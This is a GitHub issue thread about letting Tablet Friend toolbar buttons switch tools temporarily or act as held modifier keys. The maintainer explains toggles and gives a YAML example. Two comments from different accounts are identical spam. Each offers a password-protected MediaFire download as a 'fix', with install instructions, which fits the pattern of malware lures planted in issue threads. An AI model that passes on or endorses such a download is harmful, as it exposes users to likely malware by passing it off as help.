### ISSUE TITLE
Ability to temporarily activate an action / ability to physically hold a toolbar button

### ISSUE THREAD

**Issue by ChiraChan** [Martenfur/TabletFriend#51]
In Photoshop, you have the ability to temporarily press down a keyboard button, in order to only temporarily switch to that tool. Once you let go, the tool switches back to your previous one. I would love to have this feature in Tablet Friend.

For example, I have Tablet Friend toolbar buttons for the eyedropper tool and the brush tool. Every time I want to switch to the eyedropper, I have to tap on its button, then tap on the point of my canvas I want to pick color from, then tap on the brush button, then move back to the canvas where I want to keep drawing with my new color. That's a lot of taps for an action I often need to do very rapidly when drawing.

One solution would be to be able to physically hold the eyedropper button with a finger, while being able to draw with the pen at the same time. Then once you let go, it switches back to your previous tool/button.

Another solution would be to have a "temporary action" - you press the eyedropper button and it select the eyedropper, but after your next click, it switches back to the previously used button.

Both solutions may be nice to have and could offer unique use cases.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by simonpaulkeating** [comment]
The ability to have modifier keys such as alt, ctrl and shift is crucial to my (and probably every other artists) workflow. 
Most art apps use alt for color pickers and ctrl /shift along with pen motion to change brush properties (size/opacity) and zoom levels etc.
Without this, (IMO) the app is useless. But with it; it becomes legendary!

**Comment by Martenfur** [comment]
> The ability to have modifier keys such as alt, ctrl and shift is crucial to my (and probably every other artists) workflow. Most art apps use alt for color pickers and ctrl /shift along with pen motion to change brush properties (size/opacity) and zoom levels etc. Without this, (IMO) the app is useless. But with it; it becomes legendary!

Modifier buttons were supported literally from day one, what

**Comment by simonpaulkeating** [comment]
Hmm, well they don't seem to work at all on both Pcs I tried (Desktop and Laptop) with Windows 11.

?

**Comment by Martenfur** [comment]
You tap the toggle button, it holds down the modifier key for you, you tap it again to release the modifier.

**Comment by simonpaulkeating** [comment]
Yeah, but that's not how modifier keys work is it. That's called a toggle.   
  

  

  

  
  
  
  
  
>

**Comment by Martenfur** [comment]
> Yeah, but that's not how modifier keys work is it. That's called a toggle.
> […](#)
> On 10 Jan 2025 at 19:14, minkberry ***@***.***> wrote: You tap the toggle button, it holds down the modifier key for you, you tap it again to release the modifier. — Reply to this email directly, view it on GitHub, or unsubscribe. You are receiving this because you commented.Message ID: ***@***.***>

Toggles make the most sense on Windows. Because of how WPF and Windows work you holding your finger on the button will just be interpreted as a right click. Making it work as a true modifier you have to hold down will require a ton of work, and won't make much sense anyway - virtually everyone uses toggles for touch UI. Look at your phone's keyboard, for example.

If you *really* want this feature you can implement it yourself and make a PR, I'm not gonna implement it myself -- too much effort for very questionable benefits, all the while toggles work fine.

**Comment by Martenfur** [comment]
Regarding @ChiraChan 's original question, Tablet Friend doesn't have any context for the program it's being used with, so it can't switch back to a previous tool for you, unless the program allows that. There is an ability to hold down a button for a set period of time. That's not a very good solution, but better than nothing.

```yaml
	type:
		actions: # Typing "actions" instead of "action" will make the button chain multiple actions. Any action can be used.
		- hold shift # And finally, shift will be pressed for two seconds.
		- wait 2000
		- release shift
```
